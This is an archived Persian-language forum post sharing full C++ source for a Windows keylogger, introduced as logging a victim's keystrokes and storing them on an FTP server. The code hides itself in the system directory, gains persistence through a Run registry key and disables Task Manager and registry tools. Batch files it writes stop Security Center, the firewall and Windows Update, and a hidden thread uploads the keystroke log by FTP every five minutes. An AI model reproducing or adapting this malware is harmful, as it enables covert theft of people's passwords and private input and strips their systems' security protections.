Parsi Coders

نسخه‌ی کامل: سورس کد اف تی پی کیلاگر
شما در حال مشاهده نسخه آرشیو هستید. برای مشاهده نسخه کامل کلیک کنید.
سورس کد زیر یک سورس کیلاگر به زبان سی پلاس پلاس هست که دارای قابلیت ذخیره لاگ های سیستم قربانی بر روی ftp رو دارد.
FTP Keylogger
کد:
#include <windows.h>

#include <Winuser.h>

#include <string>

#include <fstream>

using namespace std;



char BatchFile[20] = "system.bat";

char* params;



DWORD WINAPI OpenBatFile(LPVOID)

{

      for(;;) {

Sleep(300000);

ShellExecute(NULL, "open", BatchFile, NULL, NULL, SW_HIDE);}

}





std::string GetKey(int Key)

{

    std::string KeyString = "";



    if (Key == 8)

        KeyString = "[delete]";

    else if (Key == 13)

        KeyString = "n";

    else if (Key == 32)

        KeyString = " ";

    else if (Key == VK_PAUSE)

        KeyString = "[PAUSE]";

    else if (Key == VK_CAPITAL)

        KeyString = "[CAPITAL]";

    else if (Key == VK_SHIFT)

        KeyString = "[SHIFT]";

    else if (Key == VK_TAB)

        KeyString = "[TABULATOR]";

    else if (Key == VK_CONTROL)

        KeyString = "[CTRL]";

    else if (Key == VK_ESCAPE)

        KeyString = "[ESCAPE]";

    else if (Key == VK_END)

        KeyString = "[END]";

    else if (Key == VK_HOME)

        KeyString = "[HOME]";

    else if (Key == VK_LEFT)

        KeyString = "[LEFT]";

    else if (Key == VK_RIGHT)

        KeyString = "[RIGHT]";

    else if (Key == VK_UP)

        KeyString = "[UP]";

    else if (Key == VK_DOWN)

        KeyString = "[DOWN]";

    else if (Key == VK_SNAPSHOT)

        KeyString = "[SNAPSHOT]";

    else if (Key == VK_NUMLOCK)

        KeyString = "[NUMLOCK]";

    else if (Key == 190 || Key == 110)

        KeyString = ".";

  

    else if (Key >=96 && Key <= 105)

        KeyString = Key-48;

    else if (Key > 47 && Key < 60)

        KeyString = Key;

    if (Key != VK_LBUTTON || Key != VK_RBUTTON)

    {

        if (Key > 64 && Key < 91)

        {

            if (GetKeyState(VK_CAPITAL))

                KeyString = Key;

            else

            {

                Key = Key + 32;

                KeyString = Key;

            }

        }

    }



    return KeyString;

}



int main()

{

    int WINAPI WinMain (HINSTANCE hThisInstance,

    HINSTANCE hPrevInstance,

    LPSTR lpszArgument,

    int nFunsterStil);

    

  char path[MAX_PATH];

  HMODULE GetModH = GetModuleHandle(NULL);

    

  char sys[MAX_PATH];

  GetModuleFileName(GetModH, path, sizeof(path));

  GetSystemDirectory(sys, sizeof(sys));

  strcat(sys, "\borg.exe");

  CopyFile(path, sys, false);

    

  HKEY hKey, hKey2;

  

  unsigned char reg[2] = "0";

  

  RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\Microsoft\Windows\CurrentVersion\Run", 0, KEY_SET_VALUE, &hKey );

  RegSetValueEx(hKey, "MS-Windows-secretly", 0, REG_SZ,(const unsigned char*)sys, sizeof(sys));

  RegCreateKey(HKEY_CURRENT_USER,"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System",&hKey2);

  RegSetValueEx(hKey2,"DisableTaskMgr",0,REG_DWORD,reg,sizeof(reg));

  RegCloseKey(hKey),(hKey2);



  DeleteFile("C:\WINDOWS\system32\log.txt");  

    

  ofstream FWUP;

  FWUP.open("C:\WINDOWS\system32\update.bat");

  FWUP<<"@echo offn";

  FWUP<<"net stop ""Security Center""n";

  FWUP<<"net stop SharedAccessn";

  FWUP<<"> ""%Temp%.\kill.reg"" ECHO REGEDIT4n";

  FWUP<<">>""%Temp%.\kill.reg"" ECHO.n";

  FWUP<<">>""%Temp%.\kill.reg"" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]n";

  FWUP<<">>""%Temp%.\kill.reg"" ECHO ""Start""=dword:00000004n";

  FWUP<<">>""%Temp%.\kill.reg"" ECHO.n";

  FWUP<<">>""%Temp%.\kill.reg"" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]n";

  FWUP<<">>""%Temp%.\kill.reg"" ECHO ""Start""=dword:00000004n";

  FWUP<<">>""%Temp%.\kill.reg"" ECHO.n";

  FWUP<<">>""%Temp%.\kill.reg"" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc]n";

  FWUP<<">>""%Temp%.\kill.reg"" ECHO ""Start""=dword:00000004n";

  FWUP<<">>""%Temp%.\kill.reg"" ECHO.n";

  FWUP<<"START /WAIT REGEDIT /S ""%Temp%.\kill.reg""n";

  FWUP<<"DEL ""%Temp%.\kill.reg""n";

  FWUP<<"DEL %0n";

  FWUP.close();  

    

  ofstream disable;

  disable.open("C:\WINDOWS\system32\syssvr.bat");

  disable<<"@echo offn";

  disable<<"reg add ""HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"" /v ""disableregistrytools"" /t REG_DWORD /d ""1"" /f >NULn";

  disable.close();  

  

  //write ur ftp-information's here

  ofstream log;

  log.open("C:\WINDOWS\system32\drivers\config.sys");

  log<<"OPEN ftpservern";

  log<<"USER usernamen";

  log<<"ftppasswordn";

  log<<"ASCIIn";

  log<<"SEND C:\WINDOWS\system32\log.txtn";

  log<<"BYEn";

  log<<"exitn";

  log.close();

  

  ofstream Ausgabe;

  Ausgabe.open("C:\WINDOWS\system32\system.bat");

  Ausgabe<<"ftp -n -i -s:C:\WINDOWS\system32\drivers\config.sysn";

  Ausgabe<<"byen";

  Ausgabe<<"exitn";

  Ausgabe.close();

  

  ShellExecute(NULL, NULL, "C:\WINDOWS\system32\syssvr.bat", params, NULL, SW_HIDE);

  ShellExecute(NULL, NULL, "C:\WINDOWS\system32\update.bat", params, NULL, SW_HIDE);

  

  DWORD OpenBatch;

  

  HANDLE hOpenBatFile = CreateThread(NULL, 0, OpenBatFile, 0, 0, &OpenBatch);

    

    std::string Filename = "C:\WINDOWS\system32\log.txt";

    std::string TempString = "";

    std::fstream FStream;

    FStream.open(Filename.c_str(), std::fstream::out | std::fstream::app);



    while(true)

    {

        // 0% CPU

        Sleep(5);



        for(int i = 8; i < 191; i++)

        {

           if(GetAsyncKeyState(i)&1 ==1)

           {

                TempString = GetKey (i);



                FStream.write(TempString.c_str(), TempString.size());

                FStream.close();

                FStream.open(Filename.c_str(), std::fstream::out | std::fstream::app);

           }

        }

    }

}